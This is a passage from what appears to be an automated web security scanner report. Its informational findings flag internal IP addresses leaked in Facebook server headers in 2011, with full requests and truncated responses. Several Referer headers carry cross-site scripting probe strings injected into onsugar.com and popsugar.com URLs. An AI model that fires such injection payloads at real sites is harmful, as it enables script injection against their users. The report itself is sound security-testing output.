14.9. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p=
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
ETag: "8ce952d2c65a22739ac5aff98a6707a7"
X-FB-Server: 10.32.155.118
X-Cnection: close
Content-Length: 14288
Vary: Accept-Encoding
Cache-Control: public, max-age=547
Expires: Mon, 12 Sep 2011 13:12:58 GMT
Date: Mon, 12 Sep 2011 13:03:51 GMT
Connection: close

/*1311721510,169909110,JIT Construction: v411252,en_US*/

.FB_UIButton{background-image:url(/images/ui/UIActionButton_ltr.png);border-style:solid;border-width:1px;display:-moz-inline-box;display:inlin
...[SNIP]...
14.10. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p=
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "faf217372bac91b0c9a6b77b116e7248"
X-FB-Server: 10.32.187.126
X-Cnection: close
Content-Length: 211324
Cache-Control: public, max-age=664
Expires: Mon, 12 Sep 2011 13:14:55 GMT
Date: Mon, 12 Sep 2011 13:03:51 GMT
Connection: close
Vary: Accept-Encoding

/*1315629037,169917310,JIT Construction: v438319,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
14.11. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p=
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "a41b2933626b3fe823a65fbe80ad9685"
X-FB-Server: 10.27.48.111
X-Cnection: close
Content-Length: 18454
Vary: Accept-Encoding
Cache-Control: public, max-age=589
Expires: Mon, 12 Sep 2011 13:13:39 GMT
Date: Mon, 12 Sep 2011 13:03:50 GMT
Connection: close

/*1315628853,169554031,JIT Construction: v438319,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
14.12. http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/XdCommReceiver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/XdCommReceiver.js HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.onsugar.com/modules/facebook_connect/xd_receiver.php
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
X-FB-Server: 10.27.220.109
X-Cnection: close
Content-Length: 3386
Cache-Control: max-age=40190
Expires: Tue, 13 Sep 2011 00:13:42 GMT
Date: Mon, 12 Sep 2011 13:03:52 GMT
Connection: close
Vary: Accept-Encoding

/**
* NOTE - this file should be editted at
* /lib/connect/Facebook/XdComm/XdCommReceiver.js
* which will rewrite any library file connect is autogened
*
* @provides XdCommReceiver
* @requi
...[SNIP]...
14.13. http://www.facebook.com/ajax/connect/connect_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/connect/connect_widget.php?__a=1&id=107566832624397&uniqid=stream_loading_indicator&force_wall=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.64.130.30
X-Cnection: close
Date: Mon, 12 Sep 2011 12:58:30 GMT
Content-Length: 21297

for (;;);{"__ar":1,"payload":null,"css":["6dq9y","XbHUZ","fGvhx"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv id=\\\"u231039_1\\\">\\u00
...[SNIP]...
14.14. http://www.facebook.com/ajax/connect/connect_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/connect/connect_widget.php?__a=1&id=107566832624397&uniqid=stream_loading_indicator&force_wall=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.62.134.39
X-Cnection: close
Date: Mon, 12 Sep 2011 13:08:40 GMT
Content-Length: 21297

for (;;);{"__ar":1,"payload":null,"css":["6dq9y","XbHUZ","fGvhx"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv id=\\\"u292038_1\\\">\\u00
...[SNIP]...
14.15. http://www.facebook.com/ajax/connect/connect_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/connect/connect_widget.php?__a=1&id=107566832624397&uniqid=stream_loading_indicator&force_wall=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.54.181.37
X-Cnection: close
Date: Mon, 12 Sep 2011 13:03:35 GMT
Content-Length: 21297

for (;;);{"__ar":1,"payload":null,"css":["6dq9y","XbHUZ","fGvhx"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv id=\\\"u261585_1\\\">\\u00
...[SNIP]...
14.16. http://www.facebook.com/ajax/connect/connect_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/connect/connect_widget.php?__a=1&id=107566832624397&uniqid=stream_loading_indicator&force_wall=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.65.32.38
X-Cnection: close
Date: Mon, 12 Sep 2011 12:53:23 GMT
Content-Length: 21297

for (;;);{"__ar":1,"payload":null,"css":["6dq9y","XbHUZ","fGvhx"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv id=\\\"u200377_1\\\">\\u00
...[SNIP]...
14.17. http://www.facebook.com/ajax/connect/connect_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/connect/connect_widget.php?__a=1&id=107566832624397&uniqid=stream_loading_indicator&force_wall=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.27.159.104
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:26 GMT
Content-Length: 20569

for (;;);{"__ar":1,"payload":null,"css":["6dq9y","XbHUZ","fGvhx"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv id=\\\"u170638_1\\\">\\u00
...[SNIP]...
14.18. http://www.facebook.com/connect.php/js/FB.Share  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect.php/js/FB.Share

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/js/FB.Share HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=1200
Content-Type: application/x-javascript; charset=utf-8
ETag: "358664d9830976a45e88c22693bb3d9e"
Expires: Mon, 12 Sep 2011 13:07:57 GMT
X-FB-Server: 10.27.186.123
X-Cnection: close
Date: Mon, 12 Sep 2011 12:47:57 GMT
Content-Length: 6585

/*1315831677,169589371,JIT Construction: v438319,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
14.19. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p=
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.173.48
X-Cnection: close
Date: Mon, 12 Sep 2011 13:03:52 GMT
Content-Length: 1224

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"onsugar.com","channel":"htt
...[SNIP]...
14.20. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111813962172064&app_id=111813962172064&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c0a350b4%26origin%3Dhttp%253A%252F%252Fwww.cargoh.com%252Ff1ed74bc74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18d5778e%26origin%3Dhttp%253A%252F%252Fwww.cargoh.com%252Ff1ed74bc74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bcbea18%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffb648fa%26origin%3Dhttp%253A%252F%252Fwww.cargoh.com%252Ff1ed74bc74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bcbea18&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36bb0e308%26origin%3Dhttp%253A%252F%252Fwww.cargoh.com%252Ff1ed74bc74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bcbea18&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b8fd6614%26origin%3Dhttp%253A%252F%252Fwww.cargoh.com%252Ff1ed74bc74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bcbea18&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.187.106
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:40 GMT
Content-Length: 240

<script type="text/javascript">
parent.postMessage("cb=f36bb0e308&origin=http\u00253A\u00252F\u00252Fwww.cargoh.com\u00252Ff1ed74bc74&relation=parent&transport=postmessage&frame=f1bcbea18", "http:\/\/
...[SNIP]...
14.21. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=127445909615&app_id=127445909615&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28fb233459d5e%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff3b426a203cc254%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bd8bd9ec27f3a%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff3b426a203cc254%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a44c0e4b549f%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d0e0b4e44b07e%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff3b426a203cc254%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a44c0e4b549f&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a328c2899b9ec%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff3b426a203cc254%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a44c0e4b549f&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ca53577db050e%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff3b426a203cc254%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a44c0e4b549f&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.156.43
X-Cnection: close
Date: Mon, 12 Sep 2011 13:02:30 GMT
Content-Length: 264

<script type="text/javascript">
parent.postMessage("cb=f1a328c2899b9ec&origin=http\u00253A\u00252F\u00252Fwww.popsugar.com\u00252Ff3b426a203cc254&relation=parent&transport=postmessage&frame=f2a44c0e4b
...[SNIP]...
14.22. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=127445909615&app_id=127445909615&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd667bad4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36fd7b1e%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f5002a3%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33dd7c2b4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df146f8bdf4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.174.125
X-Cnection: close
Date: Mon, 12 Sep 2011 12:47:56 GMT
Content-Length: 245

<script type="text/javascript">
parent.postMessage("cb=f33dd7c2b4&origin=http\u00253A\u00252F\u00252Fwww.popsugar.com\u00252Ff2363acf9c&relation=parent&transport=postmessage&frame=f155d9a90c", "http:\
...[SNIP]...
14.23. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=315957732474&app_id=315957732474&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c86c08d%26origin%3Dhttp%253A%252F%252Fwww.digitaldollhouse.com%252Ff38d9f2644%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdb32640c%26origin%3Dhttp%253A%252F%252Fwww.digitaldollhouse.com%252Ff38d9f2644%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a3027fa8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1dc1ed774%26origin%3Dhttp%253A%252F%252Fwww.digitaldollhouse.com%252Ff38d9f2644%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a3027fa8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3f3d9814c%26origin%3Dhttp%253A%252F%252Fwww.digitaldollhouse.com%252Ff38d9f2644%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a3027fa8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1902adca%26origin%3Dhttp%253A%252F%252Fwww.digitaldollhouse.com%252Ff38d9f2644%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a3027fa8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.digitaldollhouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.188.108
X-Cnection: close
